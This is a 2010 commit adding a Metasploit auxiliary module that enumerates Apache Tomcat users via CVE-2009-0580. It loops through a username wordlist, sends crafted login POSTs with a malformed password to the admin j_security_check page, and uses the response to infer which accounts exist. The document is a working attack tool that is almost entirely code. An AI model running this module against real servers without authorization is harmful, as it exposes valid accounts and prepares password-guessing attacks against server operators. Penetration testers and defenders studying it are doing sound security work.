Adding Tomcat user enumeration module for CVE-2009-0580, submitted by Heyder Andrade. Thanks!

git-svn-id: file:///home/svn/framework3/trunk@9464 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-09 21:15:49 +00:00 · 2010-06-09 21:15:49 +00:00 · 0e442ff74c
parent 922d362fdc
commit 0e442ff74c
1 changed files with 103 additions and 0 deletions
--- a/modules/auxiliary/scanner/http/tomcat_enum.rb
+++ b/modules/auxiliary/scanner/http/tomcat_enum.rb
@ -0,0 +1,103 @@
 ##
 # $Id$
 ##
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Auxiliary::Report
 	include Msf::Auxiliary::Scanner
 	include Msf::Auxiliary::AuthBrute
 	def initialize
 		super(
 			'Name'           => 'Apache Tomcat User Enumeration',
 			'Version'        => '$Revision$',
 			'Description'    => %q{Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 6.0.20, 5.5.28, and 4.1.40.},
 			'Author'         =>
 			[
 				'==[ Alligator Security Team ]==',
 				'Heyder Andrade <heyder.andrade[at]gmail.com>',
 				'Leandro Oliveira <leandrofernando[at]gmail.com>'
 			],
 			'References'     => 
 				[
 					['BID', '35196'],
 					['CVE', 'CVE-2009-0580'],
 				],  
 				'License'        =>  MSF_LICENSE
 		)   
 		register_options(
 			[ Opt::RPORT(8080),
 				OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
 				OptBool.new('VERBOSE', [ true, "Whether to print output for all attempts", true]),
 				OptString.new('UserAgent', [ false, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible MSIE 6.0; Windows NT 5.1)' ]),
 				OptPath.new('USER_FILE',  [ true, "File containing users, one per line",
 					File.join(Msf::Config.install_root, "data", "wordlists", "unix_users.txt") ]),
 			], self.class)
 		deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
 	end 
 	def target_url
 		"http://#{vhost}:#{rport}#{datastore['URI']}"
 	end
 	def run_host(ip)
 		@users_found = {}
 		each_user_pass {|user,pass|
 			do_login(user)
 		}   
 		if(@users_found.empty?)
 			print_status("#{target_url} - No users found.")
 		else
 			print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
 			report_note(
 				:host => rhost,
 				:port => rport,
 				:type => 'tomcat.users',
 				:data => {:users =>  @users_found.keys.join(", ")}
 			)
 		end 
 	end 
 	def do_login(user)
 		post_data = "j_username=#{user}&password=%"
 		vprint_status("#{target_url} - Apache Tomcat - Trying name: '#{user}'")
 		begin
 			res = send_request_cgi({
 				'method'  => 'POST',
 				'uri'     => datastore['URI'],
 				'data'    => post_data,
 			}, 20)
 			if (res and res.code == 200 and res.headers['Set-Cookie'])
 				vprint_status("#{target_url} - Apache Tomcat #{user} not found ")
 			elsif (res.code == 200)
 				print_good("#{target_url} - Apache Tomcat #{user} found ")
 				@users_found[user] = :reported
 			else
 				print_error("#{target_url} - NOT VULNERABLE")
 				return :abort
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 		rescue ::Timeout::Error, ::Errno::EPIPE
 		end
 	end
 end